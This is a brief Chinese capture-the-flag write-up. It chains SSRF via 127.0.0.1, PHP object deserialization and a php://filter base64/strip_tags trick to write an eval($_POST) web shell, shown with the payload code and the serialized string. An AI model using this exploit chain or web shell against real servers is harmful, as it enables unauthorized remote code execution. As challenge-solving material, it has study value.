1.打开环境。
2.用dirsearch扫到robots.txt
转到star1.php
可构造本地ip127.0.0.1进行ssrf伪造,从而读取任意文件。
star1.php:
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;
}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}
?>
需要绕过Yasuo,需要进行变量覆盖,接着利用file_put_contents危险函数写入shell,利用string.strip_tags去除php标签,将写入的shellbase64加密所以绕过string.strip_tags,在进行base64decode达到写入shell的目的。
接着利用arjun爆出参数为c
payload:
<?php
class GWHT{
public $hero;
}
class Yongen{ //flag.php
public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
public $text="PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==";
}
$b=new GWHT();
$b->hero=new Yongen();//覆盖
echo serialize($b);
?>
//path=http://127.0.0.1/star1.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:77:"php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";s:4:"text";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==";}}
用蚁剑连接得到flag
相关参考文章: